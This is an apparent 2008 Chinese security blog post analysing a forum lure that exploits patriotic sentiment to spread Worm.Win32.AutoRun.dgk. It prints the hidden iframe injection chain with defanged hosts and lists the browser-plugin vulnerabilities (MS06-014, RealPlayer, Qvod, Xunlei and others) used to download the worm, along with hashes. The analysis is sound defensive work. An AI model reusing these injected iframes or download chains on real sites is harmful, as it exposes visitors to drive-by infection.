小心利用大家的爱国热情来传播Worm.Win32.AutoRun.dgk的网页

endurer原创
2008-05-05 第1版

在某论坛上看到一个题为“爱国的都进来”的贴子，里面的内容是要求大家点击链接hxxp://2008qq.***8q*s*o**so*.cn/?QQ=2008-28225&id=294444559001
以表示自己的爱国热情。

#1 hxxp://2008qq.***8q*s*o**so*.cn/?QQ=2008-28225&id=294444559001 包含代码：
/---
<ifame src=hxxp://*t*t*t.d**jp*ao.net/t7.htm width=50 height=0＞＜/iframe＞
---/

#1.1 hxxp://*t*t*t.d**jp*ao.net/t7.htm 输出代码：
/---
<ifame width=50 height=0 src=hxxp://*t*t*t.d**jp*ao.net/14.htm＞＜/iframe＞
<ifame width=10 height=0 src=hxxp://*t*t*t.d**jp*ao.net/new.htm＞＜/iframe＞
<ifame style=display:none src=hxxp://*t*t*t.d**jp*ao.net/lz.htm＞＜/iframe＞
<ifame style=display:none src=hxxp://*t*t*t.d**jp*ao.net/bf.htm＞＜/iframe＞
<ifame width=10 height=0 src=hxxp://*t*t*t.d**jp*ao.net/qq.htm＞＜/iframe＞
<ifame width=50 height=0 src=hxxp://*t*t*t.d**jp*ao.net/xl.htm＞＜/iframe＞
<ifame width=50 height=0 src=hxxp://*t*t*t.d**jp*ao.net/Baidu.htm＞＜/iframe＞
<ifame width=50 height=0 src=hxxp://*t*t*t.d**jp*ao.net/rl.htm＞＜/iframe＞
<ifame style=display:none src=hxxp://*t*t*t.d**jp*ao.net/04.htm＞＜/iframe＞
---/

#1.1.1 hxxp://*t*t*t.d**jp*ao.net/14.htm

利用 MS06-014漏洞（clsid:BD96C556-65A3-11D0-983A-00C04FC29E36）下载 hxxp://*t*t*t.d**jp*ao.net/css.css

文件说明符 : D:/test/css.css
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-5-4 20:50:27
修改时间 : 2008-5-4 20:50:27
大小 : 25808 字节 25.208 KB
MD5 : dfef794a11825c2c862cec2e303983ba
SHA1: F707C17E58A6A16578DFE523DDE30408585BD93A
CRC32: 0fcf8388

css.css是一个EXE文件，卡巴斯基报为 Worm.Win32.AutoRun.dgk [KLAB-4890418]

#1.1.2 hxxp://*t*t*t.d**jp*ao.net/new.htm（瑞星报为：Trojan.DL.Script.JS.Agent.mej）

利用RealPlayer（IERPCtl.IERPCtl.1，clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93）漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css

#1.1.3 hxxp://*t*t*t.d**jp*ao.net/lz.htm

利用联众（GLCHAT.GLChatCtrl.1，clsid:61F5C358-60FB-4A23-A312-D2B556620F20）漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css

#1.1.4 hxxp://*t*t*t.d**jp*ao.net/bf.htm

利用暴风影音（MPS.StormPlayer.1，clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB）漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css

#1.1.5 hxxp://*t*t*t.d**jp*ao.net/qq.htm

利用QQ（QvodInsert.QvodCtrl.1，clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF）漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css

#1.1.6 hxxp://*t*t*t.d**jp*ao.net/xl.htm

利用迅雷（DPClient.Vod，clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F）漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css

#1.1.7 hxxp://*t*t*t.d**jp*ao.net/Baidu.htm

利用BaiDu（BaiduBar.Tool.1，clsid:{A7F05EE4-0426ID:-454F-8013-C41E3596E9E9}）下载hxxp://91wwmm.com/Baidu.cab, 内含 Baidu.exe

#1.1.8 hxxp://*t*t*t.d**jp*ao.net/rl.htm

利用RealPlayer漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css

#1.1.9 hxxp://*t*t*t.d**jp*ao.net/04.htm

利用Microsoft IE畸形VML文档处理缓冲区溢出漏洞（clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E）漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css